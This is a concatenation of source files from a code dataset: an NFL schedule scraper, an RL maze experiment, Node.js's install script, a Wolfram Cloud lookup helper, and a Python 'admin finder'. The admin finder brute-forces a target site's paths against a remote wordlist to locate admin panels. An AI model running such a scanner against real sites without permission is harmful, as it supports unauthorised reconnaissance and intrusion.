Teams.objects.get(long_name=(teams[1].get_attribute('innerHTML').lstrip().rstrip()))\n game_time = game_info.find_element_by_css_selector('p.nfl-c-matchup-strip__date-info')\n print ('--------------')\n 
print (game_time.text)\n print ('--------------')\n #tz = game_info.find_element_by_class_name('nfl-c-matchup-strip__date=timezone')\n print ('GI', game_info.text.split(' ')[1][3:])\n print ('GI', game_info.text.split(' ')[2])\n print ('GI', game_info.text.split(' ')[3])\n tz = game_time.text.split(' ')[1][3] + game_time.text.split(' ')[2][0] + game_time.text.split(' ')[3][0]\n print ('tz', tz)\n \n print ('teams ', home, away)\n #print (len(game_time.text), game_time.text)\n\n game, created = Games.objects.get_or_create(week=week, home=home, away=away)\n game.week = week\n game.eid = str (season.season) + str(week) + str(home) + str(away)\n game.away = away\n game.home = home\n game_time = game_time.text.split(' ')[0] + ' ' + game_time.text.split(' ')[1][:2] \n print ('game tiem', game_time)\n\n\n\n if tz == 'JST':\n jst = pytz.timezone('Asia/Tokyo')\n orig_time = jst.localize(datetime.strptime(web_game_date + ' ' + game_time, '%B %d, %Y %I:%M %p'))\n web_time = orig_time.astimezone(pytz.utc)\n #elif tz == 'UST':\n # ust = pytz.timezone('America/New_York')\n # orig_time = ust.localize(datetime.strptime(web_game_date + ' ' + game_time, '%B %d, %Y %H:%M %p'))\n # web_time = orig_time.astimezone(pytz.utc)\n else:\n print ('in time else')\n utc = pytz.timezone('UTC')\n #web_time = datetime.strptime(web_game_date + ' ' + game_time, '%B %d, %Y %H:%M %p')\n web_time = utc.localize(datetime.strptime(web_game_date + ' ' + game_time, '%B %d, %Y %I:%M %p'))\n \n game.game_time = web_time\n game.day = game_dow\n game.qtr = 'pregame'\n\n game.save()\n\n week.game_cnt = Games.objects.filter(week=week).count()\n week.save()\n \n except Exception as e:\n print ('exception with scrape', e)\n finally:\n week_cnt +=1\n driver.quit()\n\nif __name__ == '__main__':\n print ('populating script!')\n #clean_db()\n load_sched(2021)\n print (\"Populating Complete!\")\n #curr_week = Week.objects.get(current=True)\n #print (Games.objects.filter(week__season_model__current=True, week__week__gt=curr_week.week).values('week__week').annotate(Count('week')))\n print (Games.objects.filter(week__season_model__current=True).values('week__week').annotate(Count('week')))\n\n","repo_name":"jflynn87/games","sub_path":"load_nfl_sched.py","file_name":"load_nfl_sched.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11475060144","text":"import sys\nimport os\nsys.path.append(os.getcwd())\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time as dt\nfrom backend.maze import Navex\nimport multiprocessing as mp\nfrom functools import partial\nfrom backend.model import ResACAgent\nfrom backend.utils import saveload, save_rdyn, get_default_hp, plot_1pa_maps_dmp, get_savings\n\n\ndef singlepa_script(hp, pool):\n exptname = hp['exptname']\n btstp = hp['btstp']\n\n print(exptname)\n trsess = hp['trsess'] # number of training trials per cue, location\n epochs = hp['epochs'] # number of epochs to go through all cue-location combination\n\n # store performance\n totlat = np.zeros([btstp, epochs, trsess])\n totdgr = np.zeros([btstp, epochs])\n totpath = np.zeros([btstp,epochs, int(hp['probetime'] * (1000 // hp['tstep'])+1),2])\n\n x = pool.map(partial(sym_singleloc_expt, hp), np.arange(btstp))\n\n # Start experiment\n for b in range(btstp):\n totlat[b], totdgr[b], totpath[b], pweights, alldyn = x[b]\n\n totlat[totlat == 0] = np.nan\n\n plt.figure(figsize=(15, 8))\n plt.rcParams.update({'font.size': 8})\n plt.gcf().text(0.01, 
0.01, exptname, fontsize=10)\n ax1 = plt.subplot2grid((6, 9), (0, 0), colspan=4, rowspan=2)\n plt.ylabel('Latency (s)')\n totlat *= hp['tstep']/1000\n #plt.title('Latency, {} trials'.format(trsess))\n plt.errorbar(x=np.arange(epochs*trsess),y=np.mean(totlat,axis=0).reshape(-1),\n yerr=np.std(totlat,axis=0).reshape(-1)/np.sqrt(btstp), marker='o', color='k', elinewidth=0.5, markersize=5)\n\n ax2 = plt.subplot2grid((6, 9),(0, 5), colspan=4, rowspan=2)\n plt.ylabel('Visit Ratio per Epoch')\n dgrmean = np.mean(totdgr, axis=0)\n dgrstd = np.std(totdgr, axis=0)\n plt.errorbar(x=np.arange(epochs), y=dgrmean, yerr=dgrstd/np.sqrt(btstp), color='k')\n md, _ = np.polyfit(x=np.arange(epochs), y=dgrmean, deg=1)\n plt.legend(['VrG {:.2g}'.format(md)],loc=2)\n ax3 = plt.twinx()\n savingsm, savingss = get_savings(totlat)\n ms,_ = np.polyfit(x=np.arange(epochs),y=savingsm,deg=1)\n ax3.errorbar(x=np.arange(epochs),y=savingsm, yerr=savingss/np.sqrt(btstp), color='g')\n ax3.set_ylabel('Savings')\n ax3.legend(['SavG {:.2g}'.format(ms)],loc=1)\n\n mvpath = totpath[0]\n #midx = np.linspace(0,epochs-1,3,dtype=int)\n for i in range(hp['epochs']):\n plt.subplot(6,9,i+19)\n\n rloc = mvpath[i, -1]\n plt.ylabel('PT{}, R{}'.format(i+1, rloc))\n plt.plot(mvpath[i,:-1,0],mvpath[i,:-1,1],'k')\n plt.axis([-0.8,0.8,-0.8,0.8])\n plt.gca().set_aspect('equal', adjustable='box')\n circle = plt.Circle(rloc, 0.03, color='r')\n plt.gcf().gca().add_artist(circle)\n plt.xticks([])\n plt.yticks([])\n\n env = Navex(hp)\n env.make()\n agent = ResACAgent(hp=hp)\n\n # plot weights\n if hp['hidtype'] == 'classic':\n xx, yy = np.meshgrid(np.arange(hp['npc']), np.arange(hp['npc']))\n for i in range(hp['epochs']):\n ax = plt.subplot(6, 9, i + 28)\n actorw = pweights[i][2][:hp['npc'] ** 2].numpy()\n actorpol = np.matmul(agent.actor.aj, actorw.T)\n criticw = pweights[i][1][:, 0][:hp['npc'] ** 2].numpy()\n im = plt.imshow(criticw.reshape(hp['npc'], hp['npc']))\n plt.title('C {}'.format(np.round([np.max(criticw), np.min(criticw)], 1)))\n plt.xlabel('A {}'.format(np.round([np.max(actorw), np.min(actorw)], 1)))\n plt.colorbar(im,fraction=0.046, pad=0.04,ax=ax)\n plt.quiver(xx.reshape(-1), yy.reshape(-1), actorpol[0], actorpol[1], color='w')\n plt.xticks([])\n plt.yticks([])\n else:\n plot_1pa_maps_dmp(alldyn, mvpath, hp, pweights, pltidx=[6, 9, 28])\n\n # plt.subplot(prow, 9, 4)\n # plt.imshow(pweights[0][-1],aspect='auto')\n # plt.colorbar()\n # plt.title('Mem Weights')\n\n # plot rho\n sess = list(alldyn[1].keys())\n labels = ['rho', 'goal']\n ridx = [1,3]\n for d in range(2):\n for i in range(hp['epochs']):\n plt.subplot(6, 9, i + 37 + 9*d)\n if i == 0:\n plt.ylabel(labels[d])\n dyn = np.array(alldyn[ridx[d]][sess[i]])\n if d == 1:\n plt.axhline(y=hp['omite'], color='r', linestyle='--')\n plt.plot(dyn)\n else:\n plt.imshow(dyn.T, aspect='auto') # [:hitr[i,pidx[i]]]\n plt.colorbar()\n\n plt.show()\n\n if hp['savefig']:\n plt.savefig('./Fig/fig_{:.2g}s_{:.2g}d_{}.png'.format(ms,md, exptname))\n if hp['savegenvar']:\n saveload('save', './Data/genvars_{:.2g}s_{:.2g}d_{}_b{}_{}'.format(ms, md, exptname, btstp, dt.time()), [totlat, totdgr, totpath])\n\n return totlat, totdgr, mvpath, pweights, alldyn\n\n\ndef sym_singleloc_expt(hp,b):\n print('Agent {} started training ...'.format(b))\n exptname = hp['exptname']\n print(exptname)\n\n # create environment\n env = Navex(hp)\n\n trsess = hp['trsess']\n epochs = hp['epochs']\n\n # Create nonrewarded probe trial index\n\n # store performance\n lat = np.zeros([epochs, trsess])\n dgr = np.zeros([epochs])\n 
totpath = np.zeros([epochs, env.normax + 1, 2])\n alldyn = [{}, {}, {}, {}]\n pweights = []\n\n # Start experiment\n start = dt.time()\n agent = ResACAgent(hp=hp)\n mdlw = None\n\n # start training\n for e in range(epochs):\n\n env.make(noreward=[hp['trsess']])\n rlocs = env.rlocs\n if b == 0:\n print('All Rlocs in Epoch {}: {}'.format(e, rlocs))\n\n lat[e], dgr[e], mdlw, totpath[e] = run_sym_1rloc_expt(e, b, env, hp, agent, trsess, alldyn, useweight=mdlw)\n pweights.append(mdlw)\n\n if hp['savevar']:\n saveload('save', './Data/vars_{}_{}'.format(exptname, dt.monotonic()), [alldyn,pweights, totpath, lat, dgr])\n\n print('---------------- Agent {} done in {:3.2f} min ---------------'.format(b, (dt.time() - start) / 60))\n\n return lat, dgr, totpath, pweights, alldyn\n\n\ndef run_sym_1rloc_expt(e, b, env, hp, agent, sessions, alldyn, useweight=None, noreward=None):\n lat = np.zeros(sessions)\n dgr = []\n\n if useweight:\n agent.set_weights(useweight)\n\n for t in range(sessions*len(env.rlocs)):\n # Reset environment, actor dynamics\n state, cue, reward, done = env.reset(trial=t)\n agent.state_reset()\n trackg = []\n while not done:\n\n # Plasticity switched off when trials are non-rewarded & during cue presentation (60s)\n if t in env.nort or t in env.noct:\n plasticity = False\n else:\n plasticity = True\n\n cpc, cue, rfr = agent.see(state=state, cue=cue, startbox=env.startbox)\n\n value, xy, goal, mem = agent.estimate_value_position_goal_memory_td(cpc=cpc,cue=cue,rfr=rfr)\n\n tderr, tdxy = agent.learn(reward=reward, self_motion=env.dtxy, cpc=cpc, cue=cue, rfr=rfr, xy=xy, goal=goal,\n plasticity=plasticity)\n\n action, rho = agent.get_action(rfr=rfr, xy=xy, goal=goal)\n\n # Use action on environment, ds4r: distance from reward\n state, cue, reward, done, ds4r = env.step(action)\n\n # save lsm & actor dynamics for analysis\n if t in env.nort:\n #save_rdyn(alldyn[0], 'dmp', e, env.startpos, env.cue, rfr)\n save_rdyn(alldyn[1], 'dmp', e, env.startpos, env.cue, rho)\n save_rdyn(alldyn[2], 'dmp', e, env.startpos, env.cue, np.concatenate([value, tderr],axis=1))\n save_rdyn(alldyn[3], 'dmp', e, env.startpos, env.cue, goal)\n trackg.append(goal)\n\n if done:\n env.render()\n break\n\n if env.probe:\n dgr = env.dgr\n mvpath = np.concatenate([np.array(env.tracks[:env.normax]),env.rloc[None,:]],axis=0)\n else:\n lat[t] = env.i\n\n if hp['platform'] == 'laptop' or b == 0:\n # Trial information\n print('{} | D {:4.3f} | S {} | Dgr {} | {} as | g {} | xy{}'.format(\n t, ds4r, env.i // (1000 // env.tstep), env.dgr,\n np.round(np.mean(agent.actor.avgspeed),3), np.round(goal,2),\n np.round(xy.numpy()[0],2)))\n\n mdlw = agent.get_weights()\n if hp['platform'] == 'laptop' or b == 0:\n print('Coord max {:.3g}, min {:.3g}'.format(np.max(mdlw[0]), np.min(mdlw[0])))\n print('Critic max {:.3g}, min {:.3g}'.format(np.max(mdlw[1]), np.min(mdlw[1])))\n print('Actor max {:.3g}, min {:.3g}'.format(np.max(mdlw[2]), np.min(mdlw[2])))\n print('Goal max {:.3g}, min {:.3g}'.format(np.max(mdlw[5]), np.min(mdlw[5])))\n\n return lat, dgr, mdlw, mvpath\n\n\nif __name__ == '__main__':\n\n hp = get_default_hp(task='dmp',platform='server')\n\n hp['btstp'] = 24\n hp['savefig'] = True\n hp['savegenvar'] = True\n hp['savevar'] = False\n\n ''' agent param '''\n hp['clr'] = 0.0002\n hp['taug'] = 3000\n hp['alr'] = 0.00005\n\n hp['usenmc'] = True # confi, neural\n\n hp['stochlearn'] = True\n\n ''' env param'''\n hp['Rval'] = 5\n hp['render'] = False # visualise movement trial by trial\n\n allcb = [1]\n\n pool = 
mp.Pool(processes=hp['cpucount'])\n\n for cb in allcb:\n hp['contbeta'] = cb\n\n hp['exptname'] = 'dmp_res_{}cb_{}glr_{}sl_{}ach_{}clr_{}tg_{}alr_{}R_{}dt_b{}_{}'.format(\n hp['contbeta'], hp['glr'], hp['stochlearn'],hp['ach'], hp['clr'], hp['taug'],hp['alr'],\n hp['Rval'], hp['tstep'], hp['btstp'], dt.monotonic())\n\n totlat, totdgr, mvpath, pw, alldyn = singlepa_script(hp, pool)\n\n pool.close()\n pool.join()","repo_name":"mgkumar138/schema4one","sub_path":"dmp/dmp_res.py","file_name":"dmp_res.py","file_ext":"py","file_size_in_byte":9630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74928731394","text":"import requests, os, sys\nfrom requests.exceptions import ConnectionError\nfrom colorama import Fore\n\n\nversion = \"1.0\"\nprogram_name = sys.argv[0]\n#domain = sys.argv[1]\nlem = len(sys.argv)\nresult = 'result-scan-admin.txt'\n\ng = Fore.GREEN\nr = Fore.RED\nreset = Fore.RESET\n\nusage = (f\"usage : python3 {program_name} \")\nbanner = (f\"\"\"\n ;::::; \n ;::::; :; \n ;:::::' :; \n ;:::::; ;. \n ,:::::' ; OOO \n ::::::; ; OOOOO \n ;:::::; ; OOOOOOOO \n ,;::::::; ;' / OOOOOOO \n ;:::::::::`. ,,,;. / / DOOOOOO \n .';:::::::::::::::::;, / / DOOOO \n ,::::::;::::::;;;;::::;, / / DOOO \n;`::::::`'::::::;;;::::: ,#/ / DOOO \n:`:::::::`;::::::;;::: ;::# / DOOO\n::`:::::::`;:::::::: ;::::# / DOO\n`:`:::::::`;:::::: ;::::::#/ DOO\n :::`:::::::`;; ;:::::::::## OO\n ::::`:::::::`;::::::::;:::# OO\n `:::::`::::::::::::;'`:;::# O \n `:::::`::::::::;' / / `:# \n ::::::`:::::;' / / `#\n\n{r}The Angel Of Death {reset}- {g}Admin Finder{reset}\nVersion : {version}\n{usage}\"\"\")\n\n\ndef admin_checker():\n\tif lem != 2:\n\t\tprint(banner)\n\t\tsys.exit(0)\n\n\telse:\n\t\tdomain = sys.argv[1]\n\t\tget_wordlist = \"https://fooster1337.github.io/assets/wordlist.txt\"\n\t\tword = requests.get(get_wordlist)\n\t\tget_word = word.content.decode('utf-8')\n\t\tgetStatus = requests.get(domain)\n\t\tgetCode = getStatus.status_code\n\t\t#print(getCode)\n\t\tif getCode == 200:\n\t\t\tprint(f\"Scanning : {domain}\")\n\t\t\tprint(f\"Result save on {result}\")\n\t\t\tfor i in get_word.splitlines():\n\t\t\t\tdom_pls = (f\"{domain}/{i}\")\n\t\t\t\trq = requests.get(dom_pls)\n\t\t\t\treq = rq.status_code\n\t\t\t\t#print(f\"{req} -> {dom_pls}\")\n\t\t\t\tif req == 200:\n\t\t\t\t\tprint(f\"{g}[Found!] 
{reset}-> {dom_pls} [{g}{req}{reset}]\")\n\t\t\t\t\twith open(result, 'a') as f:\n\t\t\t\t\t\tf.write(dom_pls)\n\t\t\t\t\t\tf.write(\"\\n\")\n\t\t\t\t\tf.close()\n\t\t\t\telif req != 200:\n\t\t\t\t\tprint(f\"{r}[NoLuck] {reset}-> {dom_pls} [{r}{req}{reset}]\")\n\t\telif getCode != 200:\n\t\t\tprint(f\"Unknown Error : {getCode}\\n{usage}\")\n\t\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tadmin_checker()\n\texcept ConnectionError as E:\n\t\tprint(f\"unable to catch {domain}\\n{usage}\")\n\texcept KeyboardInterrupt:\n\t\tprint(f\"\\n{r}Exit...{reset}\")\n\t\tsys.exit(0)\n\texcept ModuleNotFoundError:\n\t\tos.system(\"pip3 install requests && pip3 install colorama\")\n\t\tadmin_checker()","repo_name":"fooster1337/admin-finder","sub_path":"finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7497483446","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport ast\nimport errno\nimport os\nimport shutil\nimport sys\nimport re\n\n# set at init time\nnode_prefix = '/usr/local' # PREFIX variable from Makefile\ninstall_path = '' # base target directory (DESTDIR + PREFIX from Makefile)\ntarget_defaults = None\nvariables = None\n\ndef abspath(*args):\n path = os.path.join(*args)\n return os.path.abspath(path)\n\ndef load_config():\n with open('config.gypi') as f:\n return ast.literal_eval(f.read())\n\ndef try_unlink(path):\n try:\n os.unlink(path)\n except OSError as e:\n if e.errno != errno.ENOENT: raise\n\ndef try_symlink(source_path, link_path):\n print('symlinking %s -> %s' % (source_path, link_path))\n try_unlink(link_path)\n try_mkdir_r(os.path.dirname(link_path))\n os.symlink(source_path, link_path)\n\ndef try_mkdir_r(path):\n try:\n os.makedirs(path)\n except OSError as e:\n if e.errno != errno.EEXIST: raise\n\ndef try_rmdir_r(path):\n path = abspath(path)\n while path.startswith(install_path):\n try:\n os.rmdir(path)\n except OSError as e:\n if e.errno == errno.ENOTEMPTY: return\n if e.errno == errno.ENOENT: return\n raise\n path = abspath(path, '..')\n\ndef mkpaths(path, dst):\n if dst.endswith('/'):\n target_path = abspath(install_path, dst, os.path.basename(path))\n else:\n target_path = abspath(install_path, dst)\n return path, target_path\n\ndef try_copy(path, dst):\n source_path, target_path = mkpaths(path, dst)\n print('installing %s' % target_path)\n try_mkdir_r(os.path.dirname(target_path))\n try_unlink(target_path) # prevent ETXTBSY errors\n return shutil.copy2(source_path, target_path)\n\ndef try_remove(path, dst):\n source_path, target_path = mkpaths(path, dst)\n print('removing %s' % target_path)\n try_unlink(target_path)\n try_rmdir_r(os.path.dirname(target_path))\n\ndef install(paths, dst):\n for path in paths:\n try_copy(path, dst)\n\ndef uninstall(paths, dst):\n for path in paths:\n try_remove(path, dst)\n\ndef package_files(action, name, bins):\n target_path = 'lib/node_modules/' + name + '/'\n\n # don't install npm if the target path is a symlink, it probably means\n # that a dev version of npm is installed there\n if os.path.islink(abspath(install_path, target_path)): return\n\n # npm has a *lot* of files and it'd be a pain to maintain a fixed list here\n # so we walk its source directory instead...\n root = 'deps/' + name\n for dirname, subdirs, basenames in os.walk(root, topdown=True):\n subdirs[:] = [subdir for subdir in subdirs if subdir != 'test']\n paths = [os.path.join(dirname, basename) for 
basename in basenames]\n action(paths, target_path + dirname[len(root) + 1:] + '/')\n\n # create/remove symlinks\n for bin_name, bin_target in bins.items():\n link_path = abspath(install_path, 'bin/' + bin_name)\n if action == uninstall:\n action([link_path], 'bin/' + bin_name)\n elif action == install:\n try_symlink('../lib/node_modules/' + name + '/' + bin_target, link_path)\n else:\n assert 0 # unhandled action type\n\ndef npm_files(action):\n package_files(action, 'npm', {\n 'npm': 'bin/npm-cli.js',\n 'npx': 'bin/npx-cli.js',\n })\n\ndef corepack_files(action):\n package_files(action, 'corepack', {\n 'corepack': 'dist/corepack.js',\n# Not the default just yet:\n# 'yarn': 'dist/yarn.js',\n# 'yarnpkg': 'dist/yarn.js',\n# 'pnpm': 'dist/pnpm.js',\n# 'pnpx': 'dist/pnpx.js',\n })\n\n # On z/OS, we install node-gyp for convenience, as some vendors don't have\n # external access and may want to build native addons.\n if sys.platform == 'zos':\n link_path = abspath(install_path, 'bin/node-gyp')\n if action == uninstall:\n action([link_path], 'bin/node-gyp')\n elif action == install:\n try_symlink('../lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js', link_path)\n else:\n assert 0 # unhandled action type\n\ndef subdir_files(path, dest, action):\n ret = {}\n for dirpath, dirnames, filenames in os.walk(path):\n files_in_path = [dirpath + '/' + f for f in filenames if f.endswith('.h')]\n ret[dest + dirpath.replace(path, '')] = files_in_path\n for subdir, files_in_path in ret.items():\n action(files_in_path, subdir + '/')\n\ndef files(action):\n is_windows = sys.platform == 'win32'\n output_file = 'node'\n output_prefix = 'out/Release/'\n\n if is_windows:\n output_file += '.exe'\n action([output_prefix + output_file], 'bin/' + output_file)\n\n if 'true' == variables.get('node_shared'):\n if is_windows:\n action([output_prefix + 'libnode.dll'], 'bin/libnode.dll')\n action([output_prefix + 'libnode.lib'], 'lib/libnode.lib')\n elif sys.platform == 'zos':\n # GYP will output to lib.target; see _InstallableTargetInstallPath\n # function in tools/gyp/pylib/gyp/generator/make.py\n output_prefix += 'lib.target/'\n\n output_lib = 'libnode.' + variables.get('shlib_suffix')\n action([output_prefix + output_lib], 'lib/' + output_lib)\n\n # create libnode.x that references libnode.so (C++ addons compat)\n os.system(os.path.dirname(os.path.realpath(__file__)) +\n '/zos/modifysidedeck.sh ' +\n abspath(install_path, 'lib/' + output_lib) + ' ' +\n abspath(install_path, 'lib/libnode.x') + ' libnode.so')\n\n # install libnode.version.so\n so_name = 'libnode.' + re.sub(r'\\.x$', '.so', variables.get('shlib_suffix'))\n action([output_prefix + so_name], variables.get('libdir') + '/' + so_name)\n\n # create symlink of libnode.so -> libnode.version.so (C++ addons compat)\n link_path = abspath(install_path, 'lib/libnode.so')\n try_symlink(so_name, link_path)\n else:\n output_lib = 'libnode.' 
+ variables.get('shlib_suffix')\n action([output_prefix + output_lib], variables.get('libdir') + '/' + output_lib)\n\n action(['deps/v8/tools/gdbinit'], 'share/doc/node/')\n action(['deps/v8/tools/lldb_commands.py'], 'share/doc/node/')\n\n if 'freebsd' in sys.platform or 'openbsd' in sys.platform:\n action(['doc/node.1'], 'man/man1/')\n else:\n action(['doc/node.1'], 'share/man/man1/')\n\n if 'true' == variables.get('node_install_npm'):\n npm_files(action)\n\n if 'true' == variables.get('node_install_corepack'):\n corepack_files(action)\n\n headers(action)\n\ndef headers(action):\n def wanted_v8_headers(files_arg, dest):\n v8_headers = [\n # The internal cppgc headers are depended on by the public\n # ones, so they need to be included as well.\n 'deps/v8/include/cppgc/internal/api-constants.h',\n 'deps/v8/include/cppgc/internal/atomic-entry-flag.h',\n 'deps/v8/include/cppgc/internal/base-page-handle.h',\n 'deps/v8/include/cppgc/internal/caged-heap-local-data.h',\n 'deps/v8/include/cppgc/internal/caged-heap.h',\n 'deps/v8/include/cppgc/internal/compiler-specific.h',\n 'deps/v8/include/cppgc/internal/finalizer-trait.h',\n 'deps/v8/include/cppgc/internal/gc-info.h',\n 'deps/v8/include/cppgc/internal/logging.h',\n 'deps/v8/include/cppgc/internal/member-storage.h',\n 'deps/v8/include/cppgc/internal/name-trait.h',\n 'deps/v8/include/cppgc/internal/persistent-node.h',\n 'deps/v8/include/cppgc/internal/pointer-policies.h',\n 'deps/v8/include/cppgc/internal/write-barrier.h',\n # cppgc headers\n 'deps/v8/include/cppgc/allocation.h',\n 'deps/v8/include/cppgc/common.h',\n 'deps/v8/include/cppgc/cross-thread-persistent.h',\n 'deps/v8/include/cppgc/custom-space.h',\n 'deps/v8/include/cppgc/default-platform.h',\n 'deps/v8/include/cppgc/ephemeron-pair.h',\n 'deps/v8/include/cppgc/explicit-management.h',\n 'deps/v8/include/cppgc/garbage-collected.h',\n 'deps/v8/include/cppgc/heap-consistency.h',\n 'deps/v8/include/cppgc/heap-handle.h',\n 'deps/v8/include/cppgc/heap-state.h',\n 'deps/v8/include/cppgc/heap-statistics.h',\n 'deps/v8/include/cppgc/heap.h',\n 'deps/v8/include/cppgc/liveness-broker.h',\n 'deps/v8/include/cppgc/macros.h',\n 'deps/v8/include/cppgc/member.h',\n 'deps/v8/include/cppgc/name-provider.h',\n 'deps/v8/include/cppgc/object-size-trait.h',\n 'deps/v8/include/cppgc/persistent.h',\n 'deps/v8/include/cppgc/platform.h',\n 'deps/v8/include/cppgc/prefinalizer.h',\n 'deps/v8/include/cppgc/process-heap-statistics.h',\n 'deps/v8/include/cppgc/sentinel-pointer.h',\n 'deps/v8/include/cppgc/source-location.h',\n 'deps/v8/include/cppgc/testing.h',\n 'deps/v8/include/cppgc/trace-trait.h',\n 'deps/v8/include/cppgc/type-traits.h',\n 'deps/v8/include/cppgc/visitor.h',\n # libplatform headers\n 'deps/v8/include/libplatform/libplatform-export.h',\n 'deps/v8/include/libplatform/libplatform.h',\n 'deps/v8/include/libplatform/v8-tracing.h',\n # v8 headers\n 'deps/v8/include/v8-array-buffer.h',\n 'deps/v8/include/v8-callbacks.h',\n 'deps/v8/include/v8-container.h',\n 'deps/v8/include/v8-context.h',\n 'deps/v8/include/v8-cppgc.h',\n 'deps/v8/include/v8-data.h',\n 'deps/v8/include/v8-date.h',\n 'deps/v8/include/v8-debug.h',\n 'deps/v8/include/v8-embedder-heap.h',\n 'deps/v8/include/v8-embedder-state-scope.h',\n 'deps/v8/include/v8-exception.h',\n 'deps/v8/include/v8-extension.h',\n 'deps/v8/include/v8-external.h',\n 'deps/v8/include/v8-forward.h',\n 'deps/v8/include/v8-function-callback.h',\n 'deps/v8/include/v8-function.h',\n 'deps/v8/include/v8-handle-base.h',\n 'deps/v8/include/v8-initialization.h',\n 
'deps/v8/include/v8-internal.h',\n 'deps/v8/include/v8-isolate.h',\n 'deps/v8/include/v8-json.h',\n 'deps/v8/include/v8-local-handle.h',\n 'deps/v8/include/v8-locker.h',\n 'deps/v8/include/v8-maybe.h',\n 'deps/v8/include/v8-memory-span.h',\n 'deps/v8/include/v8-message.h',\n 'deps/v8/include/v8-microtask-queue.h',\n 'deps/v8/include/v8-microtask.h',\n 'deps/v8/include/v8-object.h',\n 'deps/v8/include/v8-persistent-handle.h',\n 'deps/v8/include/v8-platform.h',\n 'deps/v8/include/v8-primitive-object.h',\n 'deps/v8/include/v8-primitive.h',\n 'deps/v8/include/v8-profiler.h',\n 'deps/v8/include/v8-promise.h',\n 'deps/v8/include/v8-proxy.h',\n 'deps/v8/include/v8-regexp.h',\n 'deps/v8/include/v8-script.h',\n 'deps/v8/include/v8-snapshot.h',\n 'deps/v8/include/v8-source-location.h',\n 'deps/v8/include/v8-statistics.h',\n 'deps/v8/include/v8-template.h',\n 'deps/v8/include/v8-traced-handle.h',\n 'deps/v8/include/v8-typed-array.h',\n 'deps/v8/include/v8-unwinder.h',\n 'deps/v8/include/v8-value-serializer.h',\n 'deps/v8/include/v8-value.h',\n 'deps/v8/include/v8-version.h',\n 'deps/v8/include/v8-wasm.h',\n 'deps/v8/include/v8-weak-callback-info.h',\n 'deps/v8/include/v8.h',\n 'deps/v8/include/v8config.h',\n ]\n files_arg = [name for name in files_arg if name in v8_headers]\n action(files_arg, dest)\n\n def wanted_zoslib_headers(files_arg, dest):\n import glob\n zoslib_headers = glob.glob(zoslibinc + '/*.h')\n files_arg = [name for name in files_arg if name in zoslib_headers]\n action(files_arg, dest)\n\n action([\n 'common.gypi',\n 'config.gypi',\n 'src/node.h',\n 'src/node_api.h',\n 'src/js_native_api.h',\n 'src/js_native_api_types.h',\n 'src/node_api_types.h',\n 'src/node_buffer.h',\n 'src/node_object_wrap.h',\n 'src/node_version.h',\n ], 'include/node/')\n\n # Add the expfile that is created on AIX\n if sys.platform.startswith('aix') or sys.platform == \"os400\":\n action(['out/Release/node.exp'], 'include/node/')\n\n subdir_files('deps/v8/include', 'include/node/', wanted_v8_headers)\n\n if 'false' == variables.get('node_shared_libuv'):\n subdir_files('deps/uv/include', 'include/node/', action)\n\n if 'true' == variables.get('node_use_openssl') and \\\n 'false' == variables.get('node_shared_openssl'):\n subdir_files('deps/openssl/openssl/include/openssl', 'include/node/openssl/', action)\n subdir_files('deps/openssl/config/archs', 'include/node/openssl/archs', action)\n subdir_files('deps/openssl/config', 'include/node/openssl', action)\n\n if 'false' == variables.get('node_shared_zlib'):\n action([\n 'deps/zlib/zconf.h',\n 'deps/zlib/zlib.h',\n ], 'include/node/')\n\n if sys.platform == 'zos':\n zoslibinc = os.environ.get('ZOSLIB_INCLUDES')\n if not zoslibinc:\n raise RuntimeError('Environment variable ZOSLIB_INCLUDES is not set\\n')\n if not os.path.isfile(zoslibinc + '/zos-base.h'):\n raise RuntimeError('ZOSLIB_INCLUDES is not set to a valid location\\n')\n subdir_files(zoslibinc, 'include/node/zoslib/', wanted_zoslib_headers)\n\ndef run(args):\n global node_prefix, install_path, target_defaults, variables\n\n # chdir to the project's top-level directory\n os.chdir(abspath(os.path.dirname(__file__), '..'))\n\n conf = load_config()\n variables = conf['variables']\n target_defaults = conf['target_defaults']\n\n # argv[2] is a custom install prefix for packagers (think DESTDIR)\n # argv[3] is a custom install prefix (think PREFIX)\n # Difference is that dst_dir won't be included in shebang lines etc.\n dst_dir = args[2] if len(args) > 2 else ''\n\n if len(args) > 3:\n node_prefix = args[3]\n\n # 
install_path thus becomes the base target directory.\n install_path = dst_dir + node_prefix + '/'\n\n cmd = args[1] if len(args) > 1 else 'install'\n\n if os.environ.get('HEADERS_ONLY'):\n if cmd == 'install':\n headers(install)\n return\n if cmd == 'uninstall':\n headers(uninstall)\n return\n else:\n if cmd == 'install':\n files(install)\n return\n if cmd == 'uninstall':\n files(uninstall)\n return\n\n raise RuntimeError('Bad command: %s\\n' % cmd)\n\nif __name__ == '__main__':\n run(sys.argv[:])\n","repo_name":"nodejs/node","sub_path":"tools/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":13771,"program_lang":"python","lang":"en","doc_type":"code","stars":99492,"dataset":"github-code","pt":"61"} +{"seq_id":"19784733636","text":"from amath.DataTypes.Function import Function\nfrom amath.Errors import Failure\nfrom collections import OrderedDict as OD\nfrom urllib.parse import urlencode\nfrom urllib.request import urlopen\n\n\ndef formulaLookup(x):\n \"\"\"Lookup formulas\"\"\"\n\n def wolfram_cloud_call(**args):\n arguments = dict([(key, arg) for key, arg in args.items()])\n try:\n result = urlopen(\"http://www.wolframcloud.com/objects/5c991864-3fbd-4b30-8200-d1a398aee0e2\",\n urlencode(arguments).encode(\"ascii\"))\n except:\n raise Failure(\"Cannot connect to servers\")\n return result.read()\n\n textresult = wolfram_cloud_call(x=x)\n return textresult.decode(\"ascii\")\n\n\ndef formulaData(x):\n def wolfram_cloud_call(**args):\n arguments = dict([(key, arg) for key, arg in args.items()])\n try:\n result = urlopen(\"http://www.wolframcloud.com/objects/724d6409-5efb-4bcb-907a-6897aad95193\",\n urlencode(arguments).encode(\"ascii\"))\n except:\n raise Failure(\"Cannot connect to servers\")\n return result.read()\n\n textresult = wolfram_cloud_call(x=x)\n return 